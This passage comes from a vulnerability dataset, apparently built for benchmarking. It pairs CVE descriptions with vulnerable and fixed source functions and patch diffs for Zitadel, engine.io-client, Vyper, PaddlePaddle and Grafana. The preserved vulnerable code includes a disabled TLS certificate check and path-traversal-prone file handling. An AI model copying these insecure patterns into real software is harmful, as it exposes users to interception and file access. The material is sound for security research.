&domain.LinkUsersStep{}), nil\n\t}\n\t//PLANNED: consent step\n\n\tmissing, err := projectRequired(ctx, request, repo.ProjectProvider)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif missing {\n\t\treturn append(steps, &domain.ProjectRequiredStep{}), nil\n\t}\n\n\tmissing, err = userGrantRequired(ctx, request, user, repo.UserGrantProvider)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif missing {\n\t\treturn append(steps, &domain.GrantRequiredStep{}), nil\n\t}\n\n\tok, err = repo.hasSucceededPage(ctx, request, repo.ApplicationProvider)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif ok {\n\t\tsteps = append(steps, &domain.LoginSucceededStep{})\n\t}\n\treturn append(steps, &domain.RedirectToCallbackStep{}), nil\n}"}], "fix_func": [{"id": "fix_go_289_1", "commit": "14de8ecac2afafee4975ed7ac26f3ca4a2b0f82c", "file_path": "internal/auth/repository/eventsourcing/eventstore/auth_request.go", "start_line": 768, "end_line": 832, "snippet": "func (repo *AuthRequestRepo) checkLoginName(ctx context.Context, request *domain.AuthRequest, loginNameInput string) (err error) {\n\tvar user *user_view_model.UserView\n\tloginNameInput = strings.TrimSpace(loginNameInput)\n\tpreferredLoginName := loginNameInput\n\tif request.RequestedOrgID != \"\" {\n\t\tif request.RequestedOrgDomain {\n\t\t\tdomainPolicy, err := repo.getDomainPolicy(ctx, request.RequestedOrgID)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif domainPolicy.UserLoginMustBeDomain {\n\t\t\t\tpreferredLoginName += \"@\" + request.RequestedPrimaryDomain\n\t\t\t}\n\t\t}\n\t\tuser, err = repo.checkLoginNameInputForResourceOwner(ctx, request, loginNameInput, preferredLoginName)\n\t} else {\n\t\tuser, err = repo.checkLoginNameInput(ctx, request, loginNameInput, preferredLoginName)\n\t}\n\t// return any error apart from not found ones directly\n\tif err != nil && !zerrors.IsNotFound(err) {\n\t\treturn err\n\t}\n\t// if there's an active (human) user, let's use it\n\tif user != nil && !user.HumanView.IsZero() && domain.UserState(user.State).IsEnabled() {\n\t\trequest.SetUserInfo(user.ID, loginNameInput, preferredLoginName, \"\", \"\", user.ResourceOwner)\n\t\treturn nil\n\t}\n\t// the user was either not found or not active\n\t// so check if the loginname suffix matches a verified org domain\n\t// but only if no org was requested (by id or domain)\n\tif request.RequestedOrgID == \"\" {\n\t\tok, errDomainDiscovery := repo.checkDomainDiscovery(ctx, request, loginNameInput)\n\t\tif errDomainDiscovery != nil || ok {\n\t\t\treturn errDomainDiscovery\n\t\t}\n\t}\n\t// let's once again check if the user was just inactive\n\tif user != nil && user.State == int32(domain.UserStateInactive) {\n\t\treturn zerrors.ThrowPreconditionFailed(nil, \"AUTH-2n8fs\", \"Errors.User.Inactive\")\n\t}\n\t// or locked\n\tif user != nil && user.State == int32(domain.UserStateLocked) {\n\t\treturn zerrors.ThrowPreconditionFailed(nil, \"AUTH-SF3gb\", \"Errors.User.Locked\")\n\t}\n\t// let's just check if unknown usernames are ignored\n\tif request.LoginPolicy != nil && request.LoginPolicy.IgnoreUnknownUsernames {\n\t\tif request.LabelPolicy != nil && request.LabelPolicy.HideLoginNameSuffix {\n\t\t\tpreferredLoginName = loginNameInput\n\t\t}\n\t\trequest.SetUserInfo(unknownUserID, preferredLoginName, preferredLoginName, preferredLoginName, \"\", request.RequestedOrgID)\n\t\treturn nil\n\t}\n\t// there was no policy that allowed unknown loginnames in any case\n\t// so not found errors can now be returned\n\tif err != nil {\n\t\treturn err\n\t}\n\t// let's check if it was a machine user\n\tif !user.MachineView.IsZero() {\n\t\treturn zerrors.ThrowPreconditionFailed(nil, \"AUTH-DGV4g\", \"Errors.User.NotHuman\")\n\t}\n\t// everything should be handled by now\n\tlogging.WithFields(\"authRequest\", request.ID, \"loginName\", loginNameInput).Error(\"unhandled state for checkLoginName\")\n\treturn zerrors.ThrowInternal(nil, \"AUTH-asf3df\", \"Errors.Internal\")\n}"}, {"id": "fix_go_289_2", "commit": "14de8ecac2afafee4975ed7ac26f3ca4a2b0f82c", "file_path": "internal/auth/repository/eventsourcing/eventstore/auth_request.go", "start_line": 1037, "end_line": 1158, "snippet": "func (repo *AuthRequestRepo) nextSteps(ctx context.Context, request *domain.AuthRequest, checkLoggedIn bool) (steps []domain.NextStep, err error) {\n\tctx, span := tracing.NewSpan(ctx)\n\tdefer func() { span.EndWithError(err) }()\n\n\tif request == nil {\n\t\treturn nil, zerrors.ThrowInvalidArgument(nil, \"EVENT-ds27a\", \"Errors.Internal\")\n\t}\n\tsteps = make([]domain.NextStep, 0)\n\tif !checkLoggedIn && domain.IsPrompt(request.Prompt, domain.PromptNone) {\n\t\treturn append(steps, &domain.RedirectToCallbackStep{}), nil\n\t}\n\tif request.UserID == \"\" {\n\t\tsteps, err = repo.nextStepsUser(ctx, request)\n\t\tif err != nil || len(steps) > 0 {\n\t\t\treturn steps, err\n\t\t}\n\t}\n\tuser, err := activeUserByID(ctx, repo.UserViewProvider, repo.UserEventProvider, repo.OrgViewProvider, repo.LockoutPolicyViewProvider, request.UserID, request.LoginPolicy.IgnoreUnknownUsernames)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tuserSession, err := userSessionByIDs(ctx, repo.UserSessionViewProvider, repo.UserEventProvider, request.AgentID, user)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\trequest.SessionID = userSession.ID\n\trequest.DisplayName = userSession.DisplayName\n\trequest.AvatarKey = userSession.AvatarKey\n\tif user.HumanView != nil && user.HumanView.PreferredLanguage != \"\" {\n\t\trequest.PreferredLanguage = gu.Ptr(language.Make(user.HumanView.PreferredLanguage))\n\t}\n\n\tisInternalLogin := (request.SelectedIDPConfigID == \"\" && userSession.SelectedIDPConfigID == \"\") || request.RequestLocalAuth\n\tidps, err := checkExternalIDPsOfUser(ctx, repo.IDPUserLinksProvider, user.ID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tnoLocalAuth := request.LoginPolicy != nil && !request.LoginPolicy.AllowUsernamePassword\n\n\tallowedLinkedIDPs := checkForAllowedIDPs(request.AllowedExternalIDPs, idps.Links)\n\tif (!isInternalLogin || len(allowedLinkedIDPs) > 0 || noLocalAuth) &&\n\t\tlen(request.LinkingUsers) == 0 &&\n\t\t!request.RequestLocalAuth {\n\t\tstep, err := repo.idpChecked(request, allowedLinkedIDPs, userSession)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif step != nil {\n\t\t\treturn append(steps, step), nil\n\t\t}\n\t}\n\tif isInternalLogin || (!isInternalLogin && len(request.LinkingUsers) > 0) {\n\t\tstep := repo.firstFactorChecked(ctx, request, user, userSession)\n\t\tif step != nil {\n\t\t\treturn append(steps, step), nil\n\t\t}\n\t}\n\n\t// If the user never had a verified email, we need to verify it.\n\t// This prevents situations, where OTP email is the only MFA method and no verified email is set.\n\t// If the user had a verified email, but change it and has not yet verified the new one, we'll verify it after we checked the MFA methods.\n\tif user.VerifiedEmail == \"\" && !user.IsEmailVerified {\n\t\treturn append(steps, &domain.VerifyEMailStep{\n\t\t\tInitPassword: !user.PasswordSet && len(idps.Links) == 0,\n\t\t}), nil\n\t}\n\n\tstep, ok, err := repo.mfaChecked(userSession, request, user, isInternalLogin && len(request.LinkingUsers) == 0)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif !ok {\n\t\treturn append(steps, step), nil\n\t}\n\n\texpired := passwordAgeChangeRequired(request.PasswordAgePolicy, user.PasswordChanged)\n\tif expired || user.PasswordChangeRequired {\n\t\tsteps = append(steps, &domain.ChangePasswordStep{Expired: expired})\n\t}\n\tif !user.IsEmailVerified {\n\t\tsteps = append(steps, &domain.VerifyEMailStep{\n\t\t\tInitPassword: !user.PasswordSet && len(idps.Links) == 0,\n\t\t})\n\t}\n\tif user.UsernameChangeRequired {\n\t\tsteps = append(steps, &domain.ChangeUsernameStep{})\n\t}\n\n\tif expired || user.PasswordChangeRequired || !user.IsEmailVerified || user.UsernameChangeRequired {\n\t\treturn steps, nil\n\t}\n\n\tif request.LinkingUsers != nil && len(request.LinkingUsers) != 0 {\n\t\treturn append(steps, &domain.LinkUsersStep{}), nil\n\t}\n\t//PLANNED: consent step\n\n\tmissing, err := projectRequired(ctx, request, repo.ProjectProvider)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif missing {\n\t\treturn append(steps, &domain.ProjectRequiredStep{}), nil\n\t}\n\n\tmissing, err = userGrantRequired(ctx, request, user, repo.UserGrantProvider)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif missing {\n\t\treturn append(steps, &domain.GrantRequiredStep{}), nil\n\t}\n\n\tok, err = repo.hasSucceededPage(ctx, request, repo.ApplicationProvider)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif ok {\n\t\tsteps = append(steps, &domain.LoginSucceededStep{})\n\t}\n\treturn append(steps, &domain.RedirectToCallbackStep{}), nil\n}"}], "vul_patch": "--- a/internal/auth/repository/eventsourcing/eventstore/auth_request.go\n+++ b/internal/auth/repository/eventsourcing/eventstore/auth_request.go\n@@ -22,7 +22,7 @@\n \t}\n \t// if there's an active (human) user, let's use it\n \tif user != nil && !user.HumanView.IsZero() && domain.UserState(user.State).IsEnabled() {\n-\t\trequest.SetUserInfo(user.ID, loginNameInput, user.PreferredLoginName, \"\", \"\", user.ResourceOwner)\n+\t\trequest.SetUserInfo(user.ID, loginNameInput, preferredLoginName, \"\", \"\", user.ResourceOwner)\n \t\treturn nil\n \t}\n \t// the user was either not found or not active\n\n--- a/internal/auth/repository/eventsourcing/eventstore/auth_request.go\n+++ b/internal/auth/repository/eventsourcing/eventstore/auth_request.go\n@@ -18,9 +18,6 @@\n \tuser, err := activeUserByID(ctx, repo.UserViewProvider, repo.UserEventProvider, repo.OrgViewProvider, repo.LockoutPolicyViewProvider, request.UserID, request.LoginPolicy.IgnoreUnknownUsernames)\n \tif err != nil {\n \t\treturn nil, err\n-\t}\n-\tif user.PreferredLoginName != \"\" {\n-\t\trequest.LoginName = user.PreferredLoginName\n \t}\n \tuserSession, err := userSessionByIDs(ctx, repo.UserSessionViewProvider, repo.UserEventProvider, request.AgentID, user)\n \tif err != nil {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2016-10536", "cve_description": "engine.io-client is the client for engine.io, the implementation of a transport-based cross-browser/cross-device bi-directional communication layer for Socket.IO. The vulnerability is related to the way that node.js handles the `rejectUnauthorized` setting. If the value is something that evaluates to false, certificate verification will be disabled. This is problematic as engine.io-client 1.6.8 and earlier passes in an object for settings that includes the rejectUnauthorized property, whether it has been set or not. If the value has not been explicitly changed, it will be passed in as `null`, resulting in certificate verification being turned off.", "cwe_info": {"CWE-295": {"name": "Improper Certificate Validation", "description": "The product does not validate, or incorrectly validates, a certificate."}}, "repo": "https://github.com/socketio/engine.io-client", "patch_url": ["https://github.com/socketio/engine.io-client/commit/2c55b278a491bf45313ecc0825cf800e2f7ff5c1"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_78_1", "commit": "6045ccf", "file_path": "lib/socket.js", "start_line": "28", "end_line": "104", "snippet": "function Socket (uri, opts) {\n if (!(this instanceof Socket)) return new Socket(uri, opts);\n\n opts = opts || {};\n\n if (uri && 'object' === typeof uri) {\n opts = uri;\n uri = null;\n }\n\n if (uri) {\n uri = parseuri(uri);\n opts.hostname = uri.host;\n opts.secure = uri.protocol === 'https' || uri.protocol === 'wss';\n opts.port = uri.port;\n if (uri.query) opts.query = uri.query;\n } else if (opts.host) {\n opts.hostname = parseuri(opts.host).host;\n }\n\n this.secure = null != opts.secure ? opts.secure\n : (global.location && 'https:' === location.protocol);\n\n if (opts.hostname && !opts.port) {\n // if no port is specified manually, use the protocol default\n opts.port = this.secure ? '443' : '80';\n }\n\n this.agent = opts.agent || false;\n this.hostname = opts.hostname ||\n (global.location ? location.hostname : 'localhost');\n this.port = opts.port || (global.location && location.port\n ? location.port\n : (this.secure ? 443 : 80));\n this.query = opts.query || {};\n if ('string' === typeof this.query) this.query = parseqs.decode(this.query);\n this.upgrade = false !== opts.upgrade;\n this.path = (opts.path || '/engine.io').replace(/\\/$/, '') + '/';\n this.forceJSONP = !!opts.forceJSONP;\n this.jsonp = false !== opts.jsonp;\n this.forceBase64 = !!opts.forceBase64;\n this.enablesXDR = !!opts.enablesXDR;\n this.timestampParam = opts.timestampParam || 't';\n this.timestampRequests = opts.timestampRequests;\n this.transports = opts.transports || ['polling', 'websocket'];\n this.readyState = '';\n this.writeBuffer = [];\n this.policyPort = opts.policyPort || 843;\n this.rememberUpgrade = opts.rememberUpgrade || false;\n this.binaryType = null;\n this.onlyBinaryUpgrades = opts.onlyBinaryUpgrades;\n this.perMessageDeflate = false !== opts.perMessageDeflate ? (opts.perMessageDeflate || {}) : false;\n\n if (true === this.perMessageDeflate) this.perMessageDeflate = {};\n if (this.perMessageDeflate && null == this.perMessageDeflate.threshold) {\n this.perMessageDeflate.threshold = 1024;\n }\n\n // SSL options for Node.js client\n this.pfx = opts.pfx || null;\n this.key = opts.key || null;\n this.passphrase = opts.passphrase || null;\n this.cert = opts.cert || null;\n this.ca = opts.ca || null;\n this.ciphers = opts.ciphers || null;\n this.rejectUnauthorized = opts.rejectUnauthorized === undefined ? null : opts.rejectUnauthorized;\n\n // other options for Node.js client\n var freeGlobal = typeof global === 'object' && global;\n if (freeGlobal.global === freeGlobal) {\n if (opts.extraHeaders && Object.keys(opts.extraHeaders).length > 0) {\n this.extraHeaders = opts.extraHeaders;\n }\n }\n\n this.open();\n}"}], "fix_func": [{"id": "fix_js_78_1", "commit": "2c55b27", "file_path": "lib/socket.js", "start_line": "28", "end_line": "104", "snippet": "function Socket (uri, opts) {\n if (!(this instanceof Socket)) return new Socket(uri, opts);\n\n opts = opts || {};\n\n if (uri && 'object' === typeof uri) {\n opts = uri;\n uri = null;\n }\n\n if (uri) {\n uri = parseuri(uri);\n opts.hostname = uri.host;\n opts.secure = uri.protocol === 'https' || uri.protocol === 'wss';\n opts.port = uri.port;\n if (uri.query) opts.query = uri.query;\n } else if (opts.host) {\n opts.hostname = parseuri(opts.host).host;\n }\n\n this.secure = null != opts.secure ? opts.secure\n : (global.location && 'https:' === location.protocol);\n\n if (opts.hostname && !opts.port) {\n // if no port is specified manually, use the protocol default\n opts.port = this.secure ? '443' : '80';\n }\n\n this.agent = opts.agent || false;\n this.hostname = opts.hostname ||\n (global.location ? location.hostname : 'localhost');\n this.port = opts.port || (global.location && location.port\n ? location.port\n : (this.secure ? 443 : 80));\n this.query = opts.query || {};\n if ('string' === typeof this.query) this.query = parseqs.decode(this.query);\n this.upgrade = false !== opts.upgrade;\n this.path = (opts.path || '/engine.io').replace(/\\/$/, '') + '/';\n this.forceJSONP = !!opts.forceJSONP;\n this.jsonp = false !== opts.jsonp;\n this.forceBase64 = !!opts.forceBase64;\n this.enablesXDR = !!opts.enablesXDR;\n this.timestampParam = opts.timestampParam || 't';\n this.timestampRequests = opts.timestampRequests;\n this.transports = opts.transports || ['polling', 'websocket'];\n this.readyState = '';\n this.writeBuffer = [];\n this.policyPort = opts.policyPort || 843;\n this.rememberUpgrade = opts.rememberUpgrade || false;\n this.binaryType = null;\n this.onlyBinaryUpgrades = opts.onlyBinaryUpgrades;\n this.perMessageDeflate = false !== opts.perMessageDeflate ? (opts.perMessageDeflate || {}) : false;\n\n if (true === this.perMessageDeflate) this.perMessageDeflate = {};\n if (this.perMessageDeflate && null == this.perMessageDeflate.threshold) {\n this.perMessageDeflate.threshold = 1024;\n }\n\n // SSL options for Node.js client\n this.pfx = opts.pfx || null;\n this.key = opts.key || null;\n this.passphrase = opts.passphrase || null;\n this.cert = opts.cert || null;\n this.ca = opts.ca || null;\n this.ciphers = opts.ciphers || null;\n this.rejectUnauthorized = opts.rejectUnauthorized === undefined ? true : opts.rejectUnauthorized;\n\n // other options for Node.js client\n var freeGlobal = typeof global === 'object' && global;\n if (freeGlobal.global === freeGlobal) {\n if (opts.extraHeaders && Object.keys(opts.extraHeaders).length > 0) {\n this.extraHeaders = opts.extraHeaders;\n }\n }\n\n this.open();\n}"}], "vul_patch": "--- a/lib/socket.js\n+++ b/lib/socket.js\n@@ -63,7 +63,7 @@\n this.cert = opts.cert || null;\n this.ca = opts.ca || null;\n this.ciphers = opts.ciphers || null;\n- this.rejectUnauthorized = opts.rejectUnauthorized === undefined ? null : opts.rejectUnauthorized;\n+ this.rejectUnauthorized = opts.rejectUnauthorized === undefined ? true : opts.rejectUnauthorized;\n \n // other options for Node.js client\n var freeGlobal = typeof global === 'object' && global;\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-22419", "cve_description": "Vyper is a Pythonic Smart Contract Language for the Ethereum Virtual Machine. The `concat` built-in can write over the bounds of the memory buffer that was allocated for it and thus overwrite existing valid data. The root cause is that the `build_IR` for `concat` doesn't properly adhere to the API of copy functions (for `>=0.3.2` the `copy_bytes` function). A contract search was performed and no vulnerable contracts were found in production. The buffer overflow can result in the change of semantics of the contract. The overflow is length-dependent and thus it might go unnoticed during contract testing. However, certainly not all usages of concat will result in overwritten valid data as we require it to be in an internal function and close to the return statement where other memory allocations don't occur. This issue has been addressed in 0.4.0.", "cwe_info": {"CWE-787": {"name": "Out-of-bounds Write", "description": "The product writes data past the end, or before the beginning, of the intended buffer."}}, "repo": "https://github.com/vyperlang/vyper", "patch_url": ["https://github.com/vyperlang/vyper/commit/55e18f6d128b2da8986adbbcccf1cd59a4b9ad6f"], "programing_language": "Python", "vul_func": [{"id": "vul_py_429_1", "commit": "56b0d4f", "file_path": "vyper/builtins/functions.py", "start_line": 530, "end_line": 589, "snippet": " def build_IR(self, expr, context):\n args = [Expr(arg, context).ir_node for arg in expr.args]\n if len(args) < 2:\n raise StructureException(\"Concat expects at least two arguments\", expr)\n\n # Maximum length of the output\n dst_maxlen = sum(\n [arg.typ.maxlen if isinstance(arg.typ, _BytestringT) else arg.typ.m for arg in args]\n )\n\n # TODO: try to grab these from semantic analysis\n if isinstance(args[0].typ, StringT):\n ret_typ = StringT(dst_maxlen)\n else:\n ret_typ = BytesT(dst_maxlen)\n\n # Node representing the position of the output in memory\n dst = IRnode.from_list(\n context.new_internal_variable(ret_typ),\n typ=ret_typ,\n location=MEMORY,\n annotation=\"concat destination\",\n )\n\n ret = [\"seq\"]\n # stack item representing our current offset in the dst buffer\n ofst = \"concat_ofst\"\n\n # TODO: optimize for the case where all lengths are statically known.\n for arg in args:\n dst_data = add_ofst(bytes_data_ptr(dst), ofst)\n\n if isinstance(arg.typ, _BytestringT):\n # Ignore empty strings\n if arg.typ.maxlen == 0:\n continue\n\n with arg.cache_when_complex(\"arg\") as (b1, arg):\n argdata = bytes_data_ptr(arg)\n\n with get_bytearray_length(arg).cache_when_complex(\"len\") as (b2, arglen):\n do_copy = [\n \"seq\",\n copy_bytes(dst_data, argdata, arglen, arg.typ.maxlen),\n [\"set\", ofst, [\"add\", ofst, arglen]],\n ]\n ret.append(b1.resolve(b2.resolve(do_copy)))\n\n else:\n ret.append(STORE(dst_data, unwrap_location(arg)))\n ret.append([\"set\", ofst, [\"add\", ofst, arg.typ.m]])\n\n ret.append(STORE(dst, ofst))\n\n # Memory location of the output\n ret.append(dst)\n\n return IRnode.from_list(\n [\"with\", ofst, 0, ret], typ=ret_typ, location=MEMORY, annotation=\"concat\"\n )"}], "fix_func": [{"id": "fix_py_429_1", "commit": "55e18f6d128b2da8986adbbcccf1cd59a4b9ad6f", "file_path": "vyper/builtins/functions.py", "start_line": 530, "end_line": 588, "snippet": " def build_IR(self, expr, context):\n args = [Expr(arg, context).ir_node for arg in expr.args]\n if len(args) < 2:\n raise StructureException(\"Concat expects at least two arguments\", expr)\n\n # Maximum length of the output\n dst_maxlen = sum(\n [arg.typ.maxlen if isinstance(arg.typ, _BytestringT) else arg.typ.m for arg in args]\n )\n\n # TODO: try to grab these from semantic analysis\n if isinstance(args[0].typ, StringT):\n ret_typ = StringT(dst_maxlen)\n else:\n ret_typ = BytesT(dst_maxlen)\n\n # respect API of copy_bytes\n bufsize = dst_maxlen + 32\n buf = context.new_internal_variable(BytesT(bufsize))\n\n # Node representing the position of the output in memory\n dst = IRnode.from_list(buf, typ=ret_typ, location=MEMORY, annotation=\"concat destination\")\n\n ret = [\"seq\"]\n # stack item representing our current offset in the dst buffer\n ofst = \"concat_ofst\"\n\n # TODO: optimize for the case where all lengths are statically known.\n for arg in args:\n dst_data = add_ofst(bytes_data_ptr(dst), ofst)\n\n if isinstance(arg.typ, _BytestringT):\n # Ignore empty strings\n if arg.typ.maxlen == 0:\n continue\n\n with arg.cache_when_complex(\"arg\") as (b1, arg):\n argdata = bytes_data_ptr(arg)\n\n with get_bytearray_length(arg).cache_when_complex(\"len\") as (b2, arglen):\n do_copy = [\n \"seq\",\n copy_bytes(dst_data, argdata, arglen, arg.typ.maxlen),\n [\"set\", ofst, [\"add\", ofst, arglen]],\n ]\n ret.append(b1.resolve(b2.resolve(do_copy)))\n\n else:\n ret.append(STORE(dst_data, unwrap_location(arg)))\n ret.append([\"set\", ofst, [\"add\", ofst, arg.typ.m]])\n\n ret.append(STORE(dst, ofst))\n\n # Memory location of the output\n ret.append(dst)\n\n return IRnode.from_list(\n [\"with\", ofst, 0, ret], typ=ret_typ, location=MEMORY, annotation=\"concat\"\n )"}], "vul_patch": "--- a/vyper/builtins/functions.py\n+++ b/vyper/builtins/functions.py\n@@ -14,13 +14,12 @@\n else:\n ret_typ = BytesT(dst_maxlen)\n \n+ # respect API of copy_bytes\n+ bufsize = dst_maxlen + 32\n+ buf = context.new_internal_variable(BytesT(bufsize))\n+\n # Node representing the position of the output in memory\n- dst = IRnode.from_list(\n- context.new_internal_variable(ret_typ),\n- typ=ret_typ,\n- location=MEMORY,\n- annotation=\"concat destination\",\n- )\n+ dst = IRnode.from_list(buf, typ=ret_typ, location=MEMORY, annotation=\"concat destination\")\n \n ret = [\"seq\"]\n # stack item representing our current offset in the dst buffer\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-0818", "cve_description": "Arbitrary File Overwrite Via Path Traversal in paddlepaddle/paddle before 2.6", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/PaddlePaddle/Paddle", "patch_url": ["https://github.com/PaddlePaddle/Paddle/commit/5c50d1a8b97b310cbc36560ec36d8377d6f29d7c"], "programing_language": "Python", "vul_func": [{"id": "vul_py_110_1", "commit": "62a1261", "file_path": "python/paddle/dataset/common.py", "start_line": 73, "end_line": 133, "snippet": "def download(url, module_name, md5sum, save_name=None):\n dirname = os.path.join(DATA_HOME, module_name)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n\n filename = os.path.join(\n dirname, url.split('/')[-1] if save_name is None else save_name\n )\n\n if os.path.exists(filename) and md5file(filename) == md5sum:\n return filename\n\n retry = 0\n retry_limit = 3\n while not (os.path.exists(filename) and md5file(filename) == md5sum):\n if os.path.exists(filename):\n sys.stderr.write(f\"file {md5file(filename)} md5 {md5sum}\\n\")\n if retry < retry_limit:\n retry += 1\n else:\n raise RuntimeError(\n f\"Cannot download {url} within retry limit {retry_limit}\"\n )\n sys.stderr.write(\n f\"Cache file {filename} not found, downloading {url} \\n\"\n )\n sys.stderr.write(\"Begin to download\\n\")\n try:\n # (risemeup1):use httpx to replace requests\n with httpx.stream(\n \"GET\", url, timeout=None, follow_redirects=True\n ) as r:\n total_length = r.headers.get('content-length')\n if total_length is None:\n with open(filename, 'wb') as f:\n shutil.copyfileobj(r.raw, f)\n else:\n with open(filename, 'wb') as f:\n chunk_size = 4096\n total_length = int(total_length)\n total_iter = total_length / chunk_size + 1\n log_interval = (\n total_iter // 20 if total_iter > 20 else 1\n )\n log_index = 0\n bar = paddle.hapi.progressbar.ProgressBar(\n total_iter, name='item'\n )\n for data in r.iter_bytes(chunk_size=chunk_size):\n f.write(data)\n log_index += 1\n bar.update(log_index, {})\n if log_index % log_interval == 0:\n bar.update(log_index)\n\n except Exception as e:\n # re-try\n continue\n sys.stderr.write(\"\\nDownload finished\\n\")\n sys.stdout.flush()\n return filename"}], "fix_func": [{"id": "fix_py_110_1", "commit": "5c50d1a", "file_path": "python/paddle/dataset/common.py", "start_line": 74, "end_line": 139, "snippet": "def download(url, module_name, md5sum, save_name=None):\n module_name = re.match(\"^[a-zA-Z0-9_/\\\\-]+$\", module_name).group()\n if isinstance(save_name, str):\n save_name = re.match(\n \"^(?:(?!\\\\.\\\\.)[a-zA-Z0-9_/\\\\.-])+$\", save_name\n ).group()\n dirname = os.path.join(DATA_HOME, module_name)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n\n filename = os.path.join(\n dirname, url.split('/')[-1] if save_name is None else save_name\n )\n\n if os.path.exists(filename) and md5file(filename) == md5sum:\n return filename\n\n retry = 0\n retry_limit = 3\n while not (os.path.exists(filename) and md5file(filename) == md5sum):\n if os.path.exists(filename):\n sys.stderr.write(f\"file {md5file(filename)} md5 {md5sum}\\n\")\n if retry < retry_limit:\n retry += 1\n else:\n raise RuntimeError(\n f\"Cannot download {url} within retry limit {retry_limit}\"\n )\n sys.stderr.write(\n f\"Cache file {filename} not found, downloading {url} \\n\"\n )\n sys.stderr.write(\"Begin to download\\n\")\n try:\n # (risemeup1):use httpx to replace requests\n with httpx.stream(\n \"GET\", url, timeout=None, follow_redirects=True\n ) as r:\n total_length = r.headers.get('content-length')\n if total_length is None:\n with open(filename, 'wb') as f:\n shutil.copyfileobj(r.raw, f)\n else:\n with open(filename, 'wb') as f:\n chunk_size = 4096\n total_length = int(total_length)\n total_iter = total_length / chunk_size + 1\n log_interval = (\n total_iter // 20 if total_iter > 20 else 1\n )\n log_index = 0\n bar = paddle.hapi.progressbar.ProgressBar(\n total_iter, name='item'\n )\n for data in r.iter_bytes(chunk_size=chunk_size):\n f.write(data)\n log_index += 1\n bar.update(log_index, {})\n if log_index % log_interval == 0:\n bar.update(log_index)\n\n except Exception as e:\n # re-try\n continue\n sys.stderr.write(\"\\nDownload finished\\n\")\n sys.stdout.flush()\n return filename"}], "vul_patch": "--- a/python/paddle/dataset/common.py\n+++ b/python/paddle/dataset/common.py\n@@ -1,4 +1,9 @@\n def download(url, module_name, md5sum, save_name=None):\n+ module_name = re.match(\"^[a-zA-Z0-9_/\\\\-]+$\", module_name).group()\n+ if isinstance(save_name, str):\n+ save_name = re.match(\n+ \"^(?:(?!\\\\.\\\\.)[a-zA-Z0-9_/\\\\.-])+$\", save_name\n+ ).group()\n dirname = os.path.join(DATA_HOME, module_name)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-43798", "cve_description": "Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) iss vulnerable to directory traversal, allowing access to local files. The vulnerable URL path is: `/public/plugins//`, where is the plugin ID for any installed plugin. At no time has Grafana Cloud been vulnerable. Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. The GitHub Security Advisory contains more information about vulnerable URL paths, mitigation, and the disclosure timeline.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/grafana/grafana", "patch_url": ["https://github.com/grafana/grafana/commit/c798c0e958d15d9cc7f27c72113d572fa58545ce"], "programing_language": "Go", "vul_func": [{"id": "vul_go_13_1", "commit": "a2ad0a0", "file_path": "pkg/api/plugins.go", "start_line": 284, "end_line": 331, "snippet": "func (hs *HTTPServer) getPluginAssets(c *models.ReqContext) {\n\tpluginID := web.Params(c.Req)[\":pluginId\"]\n\tplugin, exists := hs.pluginStore.Plugin(c.Req.Context(), pluginID)\n\tif !exists {\n\t\tc.JsonApiErr(404, \"Plugin not found\", nil)\n\t\treturn\n\t}\n\n\trequestedFile := filepath.Clean(web.Params(c.Req)[\"*\"])\n\tpluginFilePath := filepath.Join(plugin.PluginDir, requestedFile)\n\n\tif !plugin.IncludedInSignature(requestedFile) {\n\t\ths.log.Warn(\"Access to requested plugin file will be forbidden in upcoming Grafana versions as the file \"+\n\t\t\t\"is not included in the plugin signature\", \"file\", requestedFile)\n\t}\n\n\t// It's safe to ignore gosec warning G304 since we already clean the requested file path and subsequently\n\t// use this with a prefix of the plugin's directory, which is set during plugin loading\n\t// nolint:gosec\n\tf, err := os.Open(pluginFilePath)\n\tif err != nil {\n\t\tif os.IsNotExist(err) {\n\t\t\tc.JsonApiErr(404, \"Plugin file not found\", err)\n\t\t\treturn\n\t\t}\n\t\tc.JsonApiErr(500, \"Could not open plugin file\", err)\n\t\treturn\n\t}\n\tdefer func() {\n\t\tif err := f.Close(); err != nil {\n\t\t\ths.log.Error(\"Failed to close file\", \"err\", err)\n\t\t}\n\t}()\n\n\tfi, err := f.Stat()\n\tif err != nil {\n\t\tc.JsonApiErr(500, \"Plugin file exists but could not open\", err)\n\t\treturn\n\t}\n\n\tif hs.Cfg.Env == setting.Dev 